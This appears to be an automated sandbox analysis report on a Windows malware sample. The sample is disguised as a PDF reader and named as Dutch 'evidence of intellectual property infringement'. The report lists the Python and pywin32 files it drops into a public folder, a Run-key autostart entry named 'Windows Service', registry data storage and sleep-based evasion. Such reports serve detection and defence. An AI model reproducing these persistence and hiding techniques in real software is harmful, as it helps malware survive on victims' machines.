Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_ICON
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_MENU
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_DIALOG
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_STRING
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_ACCELERATOR
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_GROUP_ICON

PE file has a big raw section

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7a00
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2b5e00

PE file imports many functions

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: More than 200 imports for KERNEL32.dll

PE file contains a debug data directory

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: SumatraPDF-no-MuPDF.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SumatraPDF-1.5.3.0.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 00000050.00000002.14842796907.000000006C03C000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\a\1\b\bin\win32\python310.pdb source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: .pdbhqrY source: Images.exe, 0000003D.00000003.14469255497.000001CC08C6F000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14467163576.000001CC08C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Images.exe, 0000003D.00000000.14242559496.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp, Images.exe, 0000003D.00000002.14479333368.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Images.exe, 0000003D.00000000.14242559496.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp, Images.exe, 0000003D.00000002.14479333368.00007FF608CF3000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: libmupdf.pdb source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: w.pdbit source: Images.exe, 0000003D.00000003.14469255497.000001CC08C6F000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14467163576.000001CC08C46000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

PE file contains sections with non-standard names

Source: python310.dll.61.dr	Static PE information: section name: PyRuntim
Source: libcrypto-1_1.dll.61.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.61.dr	Static PE information: section name: .00cfg

Persistence and Installation Behavior

Drops PE files

Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32gui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32_system32\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\mmapfile.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32_system32\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\pythonservice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32ts.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\bits\bits.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32profile.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32pdh.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32print.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\taskscheduler\taskscheduler.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32ras.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\win32uiole.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\ifilter\ifilter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32net.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32wnet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\perfmon.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32evtlog.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\_winxptheme.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32pipe.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\propsys\propsys.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32process.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin\scintilla.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\servicemanager.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\internet\internet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\directsound\directsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32job.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32event.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\odbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32security.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\timer.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32clipboard.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32file.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\perfmondata.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\winxpgui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32lz.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32console.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32service.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32help.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\mapi\mapi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\shell\shell.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32cred.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32inet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32transaction.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	File created: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32api.pyd	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\SysWOW64\reg.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Service

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Service
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Service

Hooking and other Techniques for Hiding and Protection

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\cmd.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\TIP\AggregateResults data

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Images.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains long sleeps (>= 3 min)

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Thread delayed: delay time: 21600000

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32_system32\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32gui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\mmapfile.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\internet\internet.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32comext\directsound\directsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Images.exe	Dropped PE file which has not been started: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\win32job.pyd	Jump to dropped file
